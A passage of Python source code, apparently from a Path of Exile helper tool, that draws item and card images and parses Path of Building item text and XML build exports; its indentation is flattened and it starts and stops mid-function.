header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
d.text(cur.pos, card.name, fill='black', font=header_font)
cur.reset_x()
cur.x = 77
cur.y = 316
cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
d.text(cur.pos, card.stack_size, fill=None, font=self.font)
cur.y = 384
cur.reset_x()
fill = flavor_color[card.reward_flavor]
cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
d.text(cur.pos, card.reward, fill=fill, font=self.font)
cur.reset_x()
if card.is_corrupted:
cur.y = 384 + self.font.getsize(card.reward)[1] + 6
cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
cur.reset_x()
cur.y = 536
first_lore = unescape_to_list(card.lore)
for first_line in first_lore:
text = first_line
if len(text.split(' ')) > 7:
lore = text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
joined_line = ' '.join(line)
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(joined_line)[0] // 2) * -1)
d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(joined_line)[1])
cur.reset_x()
else:
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
return item
def render(self, poe_item):
stats = self.sort_stats(poe_item)
fill = flavor_color[self.flavor]
try:
if self.header_font.getsize(poe_item.name) > self.header_font.getsize(poe_item.base):
header = poe_item.name
else:
header = poe_item.base
except (AttributeError, TypeError):
header = poe_item.name
box_size = self.calc_size(stats, header)
center_x = box_size[0] // 2
item = Image.new('RGBA', box_size, color='black')
cur = Cursor(center_x)
if not isinstance(poe_item, PassiveSkill):
try:
if poe_item.influences:
apply_influences = []
for influence in poe_item.influences:
if influence == "shaper":
apply_influences.append(self.shaper_badge)
elif influence == "elder":
apply_influences.append(self.elder_badge)
elif influence == "redeemer":
apply_influences.append(self.redeemer_badge)
elif influence == "crusader":
apply_influences.append(self.crusader_badge)
elif influence == "hunter":
apply_influences.append(self.hunter_badge)
elif influence == "warlord":
apply_influences.append(self.warlord_badge)
if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
else:
self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
else:
self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
else:
self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
except AttributeError:
pass
item.paste(self.namebar_left, cur.pos)
cur.move_x(self.namebar_left.size[0])
transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
self.namebar_trans.size[1]))
item.paste(transformed_namebar, cur.pos)
cur.move_x(transformed_namebar.size[0])
item.paste(self.namebar_right, cur.pos)
cur.reset_x()
d = ImageDraw.Draw(item)
cur.move_y(8)
cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
if not isinstance(poe_item, PassiveSkill):
cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
else:
cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
cur.reset_x()
if not isinstance(poe_item, PassiveSkill):
if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
if poe_item.base not in poe_item.name:
cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
cur.reset_x()
cur.y = 0
# FIXME: referenced before assignment
cur.move_y(transformed_namebar.size[1])
else:
pass
for stat in stats:
if stat.title == "Separator":
self.last_action = "Separator"
cur.move_x((self.separator.size[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING + 2)
item.paste(self.separator, cur.pos)
cur.reset_x()
elif stat.title == "Elemental Damage:":
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for element in stat.text.keys():
d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Requires":
text = stat.title
for attr in stat.text.keys():
text += f" {attr.title()} {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for attr in stat.text.keys():
if attr == 'level':
d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(f" {attr.title()}")[0])
attribute_final = f" {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font)
else:
d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
cur.move_x(self.font.getsize(attribute_final)[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
for line in stat.text:
text = line
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
self.last_action = ""
else:
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
cur.move_x((stat.text.size[0] // 2) * -1)
cur.move_y(4)
ic = stat.text
if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
item.alpha_composite(ic, cur.pos)
cur.move_y(stat.text.size[1])
cur.reset_x()
elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
ic = stat.text
if poe_item.asc_class:
frame = self.ascendancy_frame
elif poe_item.is_keystone:
frame = self.keystone_frame
elif poe_item.is_notable:
frame = self.notable_frame
else:
frame = self.passive_frame
icl = round(math.sqrt((frame.size[0] ** 2) / 2))
old_s = ic.size[0]
ic = ic.resize((icl, icl))
cur.move_x((ic.size[0] // 2) * -1)
cur.move_y(30)
item.alpha_composite(ic, cur.pos)
cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
cur.reset_x()
cur.move_x((frame.size[0] // 2) * -1)
item.alpha_composite(frame, cur.pos)
cur.move_y(frame.size[1])
cur.reset_x()
elif stat.title == "Stored Uses":
text = f"Can Store {stat.text} Use(s)"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize("Can Store ")[0])
d.text(cur.pos, stat.text + " ", font=self.font)
cur.move_x(self.font.getsize(stat.text + " ")[0])
d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
cur.reset_x()
elif stat.title == "Gem Help":
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Seal Cost: ":
coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT + STAT_SPACING)
cur.reset_x()
sealtext = f"{stat.text}X Silver Coin"
cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
item.alpha_composite(coin, cur.pos)
cur.move_x(coin.size[0] + 2)
d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
else:
text = f"{stat.title}{stat.text}"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
if ':' in stat.title:
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
else:
if stat.title.startswith('{'):
color = CRAFTED
else:
color = stat.color
d.text(cur.pos, stat.title, fill=color, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
item = ImageOps.expand(item, border=1, fill=fill)
return item
def parse_pob_item(itemtext):
item = itemtext.split('\n')
qualtext = 0
variant = None
pobitem = {'special': [], 'enchant': "", 'type': None}
for index, line in enumerate(item):
if "{variant:" in line:
variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
if variant not in variant_now:
item.pop(index)
continue
line = item[index] = line.split("}", 1)[1]
if "{range:" in line:
try:
percent = float(line[line.index("e:") + 2:line.index("}")])
except Exception:
pass
txt = line.split("}")[1]
matches = re_range.findall(txt)
for match in matches:
stat = match[1:-1]
if " to " in stat:
separator = stat.find(' to ', 1)
range_end = stat[separator + 4:]
else:
separator = stat.find('-', 1)
range_end = stat[separator + 1:]
range_start = stat[:separator]
if '.' in range_start or '.' in range_end:
# FIXME: referenced before assignment
calc_stat = float(percent * float(range_end))
else:
calc_stat = int(percent * float(range_end))
txt = txt.replace(match, str(calc_stat))
item[index] = txt
if line.startswith("Rarity"):
pobitem['rarity'] = line.split(' ')[1].title()
pobitem['rarity_index'] = index
continue
elif line.startswith("Selected Variant"):
variant = line.split(": ")[1]
continue
elif line.startswith("Item Level"):
pobitem['type'] = "game"
if item[index + 3].startswith('--'):
offset = 2
if "(implicit)" not in item[index + offset]:
pobitem['enchant'] = item[index + offset]
offset = 4
if "(implicit)" in item[index + offset]:
pobitem['implicits'] = 0
for line_inner in item[index + offset:]:
print(line_inner)
if "(implicit)" in line_inner:
pobitem['implicits'] = pobitem['implicits'] + 1
if "---" in line_inner:
break
pobitem['statstart_index'] = index + offset + pobitem['implicits']
else:
pobitem['statstart_index'] = index + offset
else:
pobitem['statstart_index'] = index + 2
elif line.startswith("====="):
pobitem['statstart_index'] = index
elif line.startswith("Implicits:") and 'implicits' not in pobitem:
pobitem['type'] = 'pob'
pobitem['implicits'] = int(line.split(': ')[1])
pobitem['statstart_index'] = index + pobitem['implicits']
elif line.startswith("Requires"):
pobitem['statstart_index'] = index
elif line.startswith("Quality"):
try:
qualtext = line.split("+")[1].split(' ')[0].strip('%')
except IndexError:
pass
if "Shaper Item" in line:
pobitem['special'].append("Shaper Item")
if "Elder Item" in line:
pobitem['special'].append("Elder Item")
if "Crusader Item" in line:
pobitem['special'].append("Crusader Item")
if "Redeemer Item" in line:
pobitem['special'].append("Redeemer Item")
if "Warlord Item" in line:
pobitem['special'].append("Warlord Item")
if "Hunter Item" in line:
pobitem['special'].append("Hunter Item")
if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
name = item[pobitem['rarity_index'] + 1]
base = item[pobitem['rarity_index'] + 2]
elif pobitem['rarity'].lower() == 'magic':
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = get_base_from_magic(name)
else:
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = name
if 'implicits' in pobitem and pobitem['implicits']:
if pobitem['type'] == 'game':
offset = 0
else:
offset = 1
implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
imp_end = "None"
for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
if stat.startswith('--'):
if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
imp_end = ind - 1
break
if imp_end != "None":
implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
else:
implicits = []
else:
implicits = []
stat_text = item[pobitem['statstart_index'] + 1:]
stat_text = [stat for stat in stat_text if not stat.startswith('--')]
if '(' in base and ')' in base:
base = base[:base.find('(') - 1]
if "Synthesised" in base:
base = base.replace("Synthesised", "").strip()
if "Synthesised" in name:
name = name.replace("Synthesised", "").strip()
return {
'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def ensure_rangeless(stat):
if "-" in str(stat):
return stat.split('-')[0][1:]
return stat
def modify_base_stats(item):
stats = {
'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
'cc': 0, 'range': 0, 'block': 0
}
if item.implicits:
for stat in unescape_to_list(item.implicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if item.explicits:
for stat in unescape_to_list(item.explicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if "critical strike chance" in text and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if 'weapon' in item.tags:
if stats['aspd']:
_as = float(ensure_rangeless(item.attack_speed))
item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
if stats['cc']:
cc = 5.0
cc += cc * (stats['cc'] / 100)
item.critical_chance = f"{cc:.2}%"
if stats['range']:
i_range = int(ensure_rangeless(item.range))
i_range += stats['range']
item.range = f"{i_range}"
if stats['fire max'] or stats['fire inc']:
if stats['fire max']:
item.fire_min = stats['fire low']
item.fire_max = stats['fire max']
fire_m = int(ensure_rangeless(item.fire_min))
fire_mx = int(ensure_rangeless(item.fire_max))
fire_m += fire_m * (stats['fire inc'] / 100)
fire_mx += fire_mx * (stats['fire inc'] / 100)
item.fire_min = str(round(fire_m))
item.fire_max = str(round(fire_mx))
if stats['cold max'] or stats['cold inc']:
if stats['cold max']:
item.cold_min = stats['cold low']
item.cold_max = stats['cold max']
cold_m = int(ensure_rangeless(item.cold_min))
cold_mx = int(ensure_rangeless(item.cold_max))
cold_m += cold_m * (stats['cold inc'] / 100)
cold_mx += cold_mx * (stats['cold inc'] / 100)
item.cold_min = str(round(cold_m))
item.cold_max = str(round(cold_mx))
if stats['light max'] or stats['light inc']:
if stats['light max']:
item.lightning_min = stats['light low']
item.lightning_max = stats['light max']
lightning_m = int(ensure_rangeless(item.lightning_min))
lightning_mx = int(ensure_rangeless(item.lightning_max))
lightning_m += lightning_m * (stats['light inc'] / 100)
lightning_mx += lightning_mx * (stats['light inc'] / 100)
item.lightning_min = str(round(lightning_m))
item.lightning_max = str(round(lightning_mx))
if stats['chaos max'] or stats['chaos inc']:
if stats['chaos max']:
item.chaos_min = stats['chaos low']
item.chaos_max = stats['chaos max']
chaos_m = int(ensure_rangeless(item.chaos_min))
chaos_mx = int(ensure_rangeless(item.chaos_max))
chaos_m += chaos_m * (stats['chaos inc'] / 100)
chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
item.chaos_min = str(round(chaos_m))
item.chaos_max = str(round(chaos_mx))
if stats['phys max'] or stats['phys inc']:
physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
physical_m += physical_m * (stats['phys inc'] / 100)
physical_mx += physical_mx * (stats['phys inc'] / 100)
item.physical_min = str(round(physical_m))
item.physical_max = str(round(physical_mx))
else:
try:
if item.armour:
arm = int(ensure_rangeless(item.armour))
arm += stats['flat armour']
arm += (stats['inc armour'] / 100) * arm
item.armour = str(round(arm))
except Exception:
return
if item.evasion:
ev = int(ensure_rangeless(item.evasion))
ev += stats['flat evasion']
ev += (stats['inc evasion'] / 100) * ev
item.evasion = str(round(ev))
if item.energy_shield:
es = int(ensure_rangeless(item.energy_shield))
es += stats['flat es']
es += (stats['inc es'] / 100) * es
item.energy_shield = str(round(es))
if "shield" in item.tags:
block = int(ensure_rangeless(item.block))
block += stats['block']
item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
try:
assert item['rarity'].lower()
except Exception:
pass
if item['rarity'].lower() in ['unique', 'relic'] and char_api:
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
if not wiki_base:
pass
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = item.get('attack_speed', 0)
wiki_base.chaos_min = item.get('chaos_min', 0)
wiki_base.chaos_max = item.get('chaos_max', 0)
wiki_base.cold_min = item.get('cold_min', 0)
wiki_base.cold_max = item.get('cold_max', 0)
wiki_base.fire_min = item.get('fire_min', 0)
wiki_base.fire_max = item.get('fire_max', 0)
wiki_base.lightning_min = item.get('lightning_min', 0)
wiki_base.lightning_max = item.get('lightning_max', 0)
wiki_base.physical_min = item.get('physical_min', 0)
wiki_base.physical_max = item.get('physical_max', 0)
wiki_base.range = item.get('range', 0)
wiki_base.critical_chance = item.get('critical_chance', 0)
elif isinstance(wiki_base, Armour):
wiki_base.armour = item.get('armour', 0)
wiki_base.evasion = item.get('evasion', 0)
wiki_base.energy_shield = item.get('energy_shield', 0)
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif item['rarity'].lower() in ['unique', 'relic']:
real_base = cl.find_items({'name': item['base']})[0]
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
wiki_base = real_base
wiki_base.implicits = item['implicits']
wiki_base.explicits = item['stats']
wiki_base.name = item['name']
wiki_base.base = item['base']
wiki_base.rarity = item['rarity']
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = real_base.attack_speed
wiki_base.chaos_min = real_base.chaos_min
wiki_base.chaos_max = real_base.chaos_max
wiki_base.cold_min = real_base.cold_min
wiki_base.cold_max = real_base.cold_max
wiki_base.fire_min = real_base.fire_min
wiki_base.fire_max = real_base.fire_max
wiki_base.lightning_min = real_base.lightning_min
wiki_base.lightning_max = real_base.lightning_max
if real_base.physical_min > wiki_base.physical_min:
wiki_base.physical_min = real_base.physical_min
if real_base.physical_max > wiki_base.physical_max:
wiki_base.physical_max = real_base.physical_max
wiki_base.range = real_base.range
wiki_base.critical_chance = real_base.critical_chance
elif isinstance(wiki_base, Armour):
wiki_base.armour = real_base.armour
wiki_base.evasion = real_base.evasion
wiki_base.energy_shield = real_base.energy_shield
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif "Flask" in item['base']:
return
else:
if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
if '' in item['stats']:
item['stats'].remove('')
item['base'] = get_base_from_magic(item['base'])
wl = []
for w in item['base'].split(' '):
if not any(char.isdigit() for char in w):
wl.append(w)
try:
wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
wiki_base.rarity = item['rarity']
wiki_base.name = item['name']
wiki_base.base = item['base']
if char_api:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['explicits']:
wiki_base.explicits = '<br>'.join(item['explicits'])
else:
try:
pass
except Exception:
pass
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['stats']:
wiki_base.explicits = '<br>'.join(item['stats'])
if item['enchant']:
wiki_base.enchant = item['enchant']
wiki_base.quality = item['quality']
if wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api or char_api is False:
if wiki_base.quality == '' or "ring" in wiki_base.tags or "amulet" in wiki_base.tags \
or "belt" in wiki_base.tags or "quiver" in wiki_base.tags or "flask" in wiki_base.tags \
or "jewel" in wiki_base.tags:
pass
else:
modify_base_stats(wiki_base)
if item['special']:
for influence in item['special']:
if influence == "Shaper Item":
wiki_base.influences.append("shaper")
elif influence == "Elder Item":
wiki_base.influences.append("elder")
elif influence == "Redeemer Item":
wiki_base.influences.append("redeemer")
elif influence == "Crusader Item":
wiki_base.influences.append("crusader")
elif influence == "Warlord Item":
wiki_base.influences.append("warlord")
elif influence == "Hunter Item":
wiki_base.influences.append("hunter")
object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
tree = Etree.ElementTree(Etree.fromstring(xml))
equipped = {}
slots = tree.findall('Items/Slot')
for slot in slots:
if 'socket' in slot.attrib['name'].lower():
continue
equipped[slot.attrib['name']] = {}
equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
if cl:
obj_dict = {}
threads = []
exc_queue = Queue()
for slot in equipped:
item_id = equipped[slot]['id']
tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
if 'variant' in tree_item.attrib:
lines = tree_item.text.replace('\t', '').split('\n')
for line in lines[:]:
if line.startswith('{variant'):
variant = line.split('variant:')[1][0]
if variant != tree_item.attrib['variant']:
lines.remove(line)
tree_item.text = '\n'.join(lines)
equipped[slot]['raw'] = tree_item.text.replace('\t', '')
try:
equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
except Exception:
continue
item = equipped[slot]['parsed']
t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if not exc_queue.empty():
raise exc_queue.get()
for slot in obj_dict:
equipped[slot]['object'] = obj_dict[slot]
skill_slots = tree.findall('Skills/Skill')
for skill in skill_slots:
if 'slot' in skill.attrib:
slot = skill.attrib['slot']
if slot in equipped:
equipped[slot]['gems'] = []
lst = equipped[slot]['gems']
else:
continue
else:
if 'gem_groups' not in equipped:
equipped['gem_groups'] = {}
try:
if not skill.getchildren()[0].attrib['nameSpec'] in equipped['gem_groups']:
equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']] = []
except Exception:
continue
lst = equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']]
gems = skill.getchildren()
for gem in gems:
gem_d = {
'name': gem.attrib['nameSpec'],
'level': gem.attrib['level'],
'enabled': gem.attrib['enabled'],
'quality': gem.attrib['quality']
}
lst.append(gem_d)
stats = {}
active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
current_tree = tree.findall('Tree/Spec')[active_spec]
tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
pos = 7
total_nodes = (len(byte_tree) - 7) // 2
nodes = []
for _ in range(total_nodes):
nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
pos += 2
stats['keystones'] = []
stats['asc_nodes'] = []
for node in nodes:
if node in keystones:
stats['keystones'].append(keystones[node])
if node in asc_nodes:
stats['asc_nodes'].append(asc_nodes[node])
stats['trees'] = {}
for spec in tree.findall('Tree/Spec'):
name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
stats['jewels'] = []
jewel_sockets = current_tree.findall('Sockets/Socket')
for socket in jewel_sockets:
if socket.attrib['itemId'] != "0":
item_id = socket.attrib['itemId']
parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
stats['jewels'].append(parsed)
stats['equipped'] = equipped
try:
stats['bandit'] = tree.find('Build').attrib['bandit']
except Exception:
stats['bandit'] = "None"
try:
stats['class'] = tree.find('Build').attrib.get('className', "None")
stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
try:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
except Exception:
